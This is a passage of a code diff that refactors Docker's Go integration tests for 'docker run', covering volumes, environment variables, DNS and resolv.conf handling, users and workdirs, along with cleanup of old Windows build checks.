dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox:glibc", "top") c.Assert(waitRun("second"), check.IsNil) // Check if default short-id alias is added automatically @@ -348,8 +353,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { ) // Create a file in a volume - if daemonPlatform == "windows" { - out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) + if testEnv.OSType == "windows" { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) } else { out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file") } @@ -358,8 +363,8 @@ func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { } // Read the file from another container using --volumes-from to access the volume in the second container - if daemonPlatform == "windows" { - out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`) + if testEnv.OSType == "windows" { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", testEnv.PlatformDefaults.BaseImage, "cmd", "/c", `type c:\some\dir\file`) } else { out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file") } @@ -376,7 +381,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { containerPath string cmd string ) - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, SameHostDaemon, DaemonIsLinux) name := "test-volume-symlink" @@ -390,7 +395,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { // In the case of Windows to Windows CI, if the machine is setup so that // the temp directory is not the C: drive, this test is invalid and will // not work. - if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" { + if testEnv.OSType == "windows" && strings.ToLower(dir[:1]) != "c" { c.Skip("Requires TEMP to point to C: drive") } @@ -400,8 +405,8 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { } f.Close() - if daemonPlatform == "windows" { - dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir) + if testEnv.OSType == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", testEnv.PlatformDefaults.BaseImage, dir, dir) containerPath = `c:\test\test` cmd = "tasklist" } else { @@ -409,10 +414,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { containerPath = "/test/test" cmd = "true" } - if _, err := buildImage(name, dockerFile, false); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile)) dockerCmd(c, "run", "-v", containerPath, name, cmd) } @@ -423,13 +425,13 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { containerPath string cmd string ) - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, SameHostDaemon, DaemonIsLinux) name := "test-volume-symlink2" - if daemonPlatform == "windows" { - dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name) + if testEnv.OSType == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", testEnv.PlatformDefaults.BaseImage, name, name) containerPath = `c:\test\test` cmd = "tasklist" } else { @@ -437,33 +439,22 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { containerPath = "/test/test" cmd = "true" } - if _, err := buildImage(name, dockerFile, false); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile)) dockerCmd(c, "run", "-v", containerPath, name, cmd) } func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) { - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 { c.Fatalf("run should fail because volume is ro: exit code %d", code) } } func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) { - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } var ( volumeDir string fileInVol string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumeDir = `c:/test` // Forward-slash as using busybox fileInVol = `c:/test/file` } else { @@ -484,7 +475,7 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { volumeDir string fileInVol string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumeDir = `c:/test` // Forward-slash as using busybox fileInVol = `c:/test/file` } else { @@ -505,16 +496,12 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { testRequires(c, SameHostDaemon) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - hostpath := randomTmpDirPath("test", daemonPlatform) + hostpath := RandomTmpDirPath("test", testEnv.OSType) if err := os.MkdirAll(hostpath, 0755); err != nil { c.Fatalf("Failed to create %s: %q", hostpath, err) } defer os.RemoveAll(hostpath) - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") // Expect this "rw" mode to be be ignored since the inherited volume is "ro" @@ -532,11 +519,11 @@ func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { // Test for GH#10618 func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { - path1 := randomTmpDirPath("test1", daemonPlatform) - path2 := randomTmpDirPath("test2", daemonPlatform) + path1 := RandomTmpDirPath("test1", testEnv.OSType) + path2 := RandomTmpDirPath("test2", testEnv.OSType) someplace := ":/someplace" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows requires that the source directory exists before calling HCS testRequires(c, SameHostDaemon) someplace = `:c:\someplace` @@ -585,7 +572,7 @@ func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { // Test for #1351 func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") @@ -594,7 +581,7 @@ func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") @@ -624,7 +611,7 @@ func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) { // Test that creating a container with a volume doesn't crash. Regression test for #995. func (s *DockerSuite) TestRunCreateVolume(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true") @@ -635,13 +622,14 @@ func (s *DockerSuite) TestRunCreateVolume(c *check.C) { func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { // Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...) testRequires(c, DaemonIsLinux) + workingDirectory, err := ioutil.TempDir("", "TestRunCreateVolumeWithSymlink") image := "docker-test-createvolumewithsymlink" buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-") buildCmd.Stdin = strings.NewReader(`FROM busybox RUN ln -s home /bar`) buildCmd.Dir = workingDirectory - err := buildCmd.Run() + err = buildCmd.Run() if err != nil { c.Fatalf("could not build '%s': %v", image, err) } @@ -667,18 +655,21 @@ func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { // Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`. func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, DaemonIsLinux) + + workingDirectory, err := ioutil.TempDir("", "TestRunVolumesFromSymlinkPath") + c.Assert(err, checker.IsNil) name := "docker-test-volumesfromsymlinkpath" prefix := "" dfContents := `FROM busybox RUN ln -s home /foo VOLUME ["/foo/bar"]` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` - dfContents = `FROM ` + WindowsBaseImage + ` + dfContents = `FROM ` + testEnv.PlatformDefaults.BaseImage + ` RUN mkdir c:\home RUN mklink /D c:\foo c:\home VOLUME ["c:/foo/bar"] @@ -688,7 +679,7 @@ func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") buildCmd.Stdin = strings.NewReader(dfContents) buildCmd.Dir = workingDirectory - err := buildCmd.Run() + err = buildCmd.Run() if err != nil { c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err) } @@ -722,7 +713,7 @@ func (s *DockerSuite) TestRunExitCode(c *check.C) { func (s *DockerSuite) TestRunUserDefaults(c *check.C) { expected := "uid=0(root) gid=0(root)" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)" } out, _ := dockerCmd(c, "run", "busybox", "id") @@ -759,7 +750,7 @@ func (s *DockerSuite) TestRunUserByIDBig(c *check.C) { if err == nil { c.Fatal("No error, but must be.", out) } - if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") { c.Fatalf("expected error about uids range, got %s", out) } } @@ -772,7 +763,7 @@ func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) { if err == nil { c.Fatal("No error, but must be.", out) } - if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") { c.Fatalf("expected error about uids range, got %s", out) } } @@ -826,21 +817,21 @@ func (s *DockerSuite) TestRunEnvironment(c *check.C) { // TODO Windows: Environment handling is different between Linux and // Windows and this test relies currently on unix functionality. testRequires(c, DaemonIsLinux) - cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env") - cmd.Env = append(os.Environ(), - "TRUE=false", - "TRICKY=tri\ncky\n", - ) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env"}, + Env: append(os.Environ(), + "TRUE=false", + "TRICKY=tri\ncky\n", + ), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSuffix(result.Stdout(), "\n"), "\n") sort.Strings(actualEnv) goodEnv := []string{ + // The first two should not be tested here, those are "inherent" environment variable. This test validates + // the -e behavior, not the default environment variable (that could be subject to change) "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=testing", "FALSE=true", @@ -870,15 +861,13 @@ func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) { // not set in our local env that they're removed (if present) in // the container - cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env") - cmd.Env = appendBaseEnv(true) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env"}, + Env: appendBaseEnv(true), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n") sort.Strings(actualEnv) goodEnv := []string{ @@ -904,15 +893,13 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { // Test to make sure that when we use -e on env vars that are // already in the env that we're overriding them - cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env") - cmd.Env = appendBaseEnv(true, "HOSTNAME=bar") - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env"}, + Env: appendBaseEnv(true, "HOSTNAME=bar"), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n") sort.Strings(actualEnv) goodEnv := []string{ @@ -932,9 +919,9 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { } func (s *DockerSuite) TestRunContainerNetwork(c *check.C) { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows busybox does not have ping. Use built in ping instead. - dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1") } else { dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1") } @@ -1232,7 +1219,7 @@ func (s *DockerSuite) TestRunModeHostname(c *check.C) { func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd") expected := "/\n" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "C:" + expected } if out != expected { @@ -1241,9 +1228,9 @@ func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { } func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows busybox will fail with Permission Denied on items such as pagefile.sys - dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`) + dockerCmd(c, "run", "-v", `c:\:c:\host`, testEnv.PlatformDefaults.BaseImage, "cmd", "-c", "dir", `c:\host`) } else { dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host") } @@ -1252,7 +1239,7 @@ func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) { mount := "/:/" targetDir := "/host" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { mount = `c:\:c\` targetDir = "c:/host" // Forward slash as using busybox } @@ -1301,29 +1288,29 @@ func (s *DockerSuite) TestRunDNSOptions(c *check.C) { // Not applicable on Windows as Windows does not support --dns*, or // the Unix-specific functionality of resolv.conf. testRequires(c, DaemonIsLinux) - out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") + result := cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") // The client will get a warning on stderr when setting DNS to a localhost address; verify this: - if !strings.Contains(stderr, "Localhost DNS setting") { - c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr) + if !strings.Contains(result.Stderr(), "Localhost DNS setting") { + c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", result.Stderr()) } - actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + actual := strings.Replace(strings.Trim(result.Stdout(), "\r\n"), "\n", " ", -1) if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" { c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual) } - out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf").Combined() actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1) - if actual != "nameserver 127.0.0.1 options ndots:3" { - c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual) + if actual != "nameserver 1.1.1.1 options ndots:3" { + c.Fatalf("expected 'nameserver 1.1.1.1 options ndots:3', but says: %q", actual) } } func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) { testRequires(c, DaemonIsLinux) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf").Stdout() actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" { @@ -1393,7 +1380,6 @@ func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) { c.Fatalf("/etc/resolv.conf does not exist") } - hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP) hostSearch = resolvconf.GetSearchDomains(resolvConf) out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") @@ -1420,10 +1406,7 @@ func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) { dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org") - cID, err := getIDByName("testperm") - if err != nil { - c.Fatal(err) - } + cID := getIDByName(c, "testperm") fmode := (os.FileMode)(0644) finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf")) @@ -1461,10 +1444,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { c.Fatal(err) } if mounted { - cmd := exec.Command("umount", "/etc/resolv.conf") - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("umount", "/etc/resolv.conf").Assert(c, icmd.Success) } //cleanup @@ -1476,10 +1456,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { //1. test that a restarting container gets an updated resolv.conf dockerCmd(c, "run", "--name=first", "busybox", "true") - containerID1, err := getIDByName("first") - if err != nil { - c.Fatal(err) - } + containerID1 := getIDByName(c, "first") // replace resolv.conf with our temporary copy bytesResolvConf := []byte(tmpResolvConf) @@ -1491,10 +1468,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "first") // check for update in container - containerResolv, err := readContainerFile(containerID1, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv := readContainerFile(c, containerID1, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv)) } @@ -1506,10 +1480,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { //2. test that a restarting container does not receive resolv.conf updates // if it modified the container copy of the starting point resolv.conf dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf") - containerID2, err := getIDByName("second") - if err != nil { - c.Fatal(err) - } + containerID2 := getIDByName(c, "second") //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { @@ -1520,11 +1491,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "second") // check for update in container - containerResolv, err = readContainerFile(containerID2, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, containerID2, "resolv.conf") if bytes.Equal(containerResolv, resolvConfSystem) { c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv)) } @@ -1539,11 +1506,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { } // check for update in container - containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, runningContainerID, "resolv.conf") if bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv)) } @@ -1553,10 +1516,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "restart", runningContainerID) // check for update in container - containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv = readContainerFile(c, runningContainerID, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv)) } @@ -1575,11 +1535,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { // our first exited container ID should have been updated, but with default DNS // after the cleanup of resolv.conf found only a localhost nameserver: - containerResolv, err = readContainerFile(containerID1, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, containerID1, "resolv.conf") expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" if !bytes.Equal(containerResolv, []byte(expected)) { c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv)) @@ -1595,10 +1551,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { // Run the container so it picks up the old settings dockerCmd(c, "run", "--name=third", "busybox", "true") - containerID3, err := getIDByName("third") - if err != nil { - c.Fatal(err) - } + containerID3 := getIDByName(c, "third") // Create a modified resolv.conf.aside and override resolv.conf with it bytesResolvConf = []byte(tmpResolvConf) @@ -1615,10 +1568,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "third") // check for update in container - containerResolv, err = readContainerFile(containerID3, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv = readContainerFile(c, containerID3, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv)) } @@ -1664,13 +1614,11 @@ func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) { // Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode // but using --attach instead of -a to make sure we read the flag correctly func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) { - cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true") - _, stderr, _, err := runCommandWithStdoutStderr(cmd) - if err == nil { - c.Fatal("Container should have exited with error code different than 0") - } else if !strings.Contains(stderr, "Conflicting options: -a and -d") { - c.Fatal("Should have been returned an error with conflicting options -a and -d") - } + icmd.RunCommand(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "Conflicting options: -a and -d", + }) } func (s *DockerSuite) TestRunState(c *check.C) { @@ -1714,15 +1662,10 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { // Not applicable on Windows as it does not support uid or gid in this way testRequires(c, DaemonIsLinux) name := "testrunvolumesuidgid" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> /etc/group - RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`, - true) - if err != nil { - c.Fatal(err) - } + RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`)) // Test that the uid and gid is copied from the image to the volume out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'") @@ -1734,17 +1677,12 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { // Test for #1582 func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { - // TODO Windows, post TP5. Windows does not yet support volume functionality + // TODO Windows, post RS1. Windows does not yet support volume functionality // that copies from the image to the volume. testRequires(c, DaemonIsLinux) name := "testruncopyvolumecontent" - _, err := buildImage(name, - `FROM busybox - RUN mkdir -p /hello/local && echo hello > /hello/local/world`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + RUN mkdir -p /hello/local && echo hello > /hello/local/world`)) // Test that the content is copied from the image to the volume out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello") @@ -1755,13 +1693,9 @@ func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { name := "testrunmdcleanuponentrypoint" - if _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENTRYPOINT ["echo"] - CMD ["testingpoint"]`, - true); err != nil { - c.Fatal(err) - } + CMD ["testingpoint"]`)) out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name) if exit != 0 { @@ -1769,15 +1703,15 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { } out = strings.TrimSpace(out) expected := "root" - if daemonPlatform == "windows" { - if strings.Contains(WindowsBaseImage, "windowsservercore") { + if testEnv.OSType == "windows" { + if strings.Contains(testEnv.PlatformDefaults.BaseImage, "windowsservercore") { expected = `user manager\containeradministrator` } else { expected = `ContainerAdministrator` // nanoserver } } if out != expected { - c.Fatalf("Expected output %s, got %q. %s", expected, out, WindowsBaseImage) + c.Fatalf("Expected output %s, got %q. %s", expected, out, testEnv.PlatformDefaults.BaseImage) } } @@ -1785,7 +1719,7 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) { existingFile := "/bin/cat" expected := "not a directory" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { existingFile = `\windows\system32\ntdll.dll` expected = `The directory name is invalid.` } @@ -1801,7 +1735,7 @@ func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) { meow := "/bin/cat" delay := 60 - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { meow = "cat" } runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow) @@ -1866,17 +1800,24 @@ func (s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) { }() result = icmd.WaitOnCmd(60*time.Second, result) - c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11}) + result.Assert(c, icmd.Expected{ExitCode: 11}) } // Test for #2267 -func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. +func (s *DockerSuite) TestRunWriteSpecialFilesAndNotCommit(c *check.C) { + // Cannot run on Windows as this files are not present in Windows testRequires(c, DaemonIsLinux) - name := "writehosts" - out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts") + + testRunWriteSpecialFilesAndNotCommit(c, "writehosts", "/etc/hosts") + testRunWriteSpecialFilesAndNotCommit(c, "writehostname", "/etc/hostname") + testRunWriteSpecialFilesAndNotCommit(c, "writeresolv", "/etc/resolv.conf") +} + +func testRunWriteSpecialFilesAndNotCommit(c *check.C, name, path string) { + command := fmt.Sprintf("echo test2267 >> %s && cat %s", path, path) + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", command) if !strings.Contains(out, "test2267") { - c.Fatal("/etc/hosts should contain 'test2267'") + c.Fatalf("%s should contain 'test2267'", path) } out, _ = dockerCmd(c, "diff", name) @@ -1886,11 +1827,9 @@ func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { } func eqToBaseDiff(out string, c *check.C) bool { - name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32) + name := "eqToBaseDiff" + testutil.GenerateRandomAlphaOnlyString(32) dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello") - cID, err := getIDByName(name) - c.Assert(err, check.IsNil) - + cID := getIDByName(c, name) baseDiff, _ := dockerCmd(c, "diff", cID) baseArr := strings.Split(baseDiff, "\n") sort.Strings(baseArr) @@ -1913,38 +1852,6 @@ func sliceEq(a, b []string) bool { return true } -// Test for #2267 -func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. - testRequires(c, DaemonIsLinux) - name := "writehostname" - 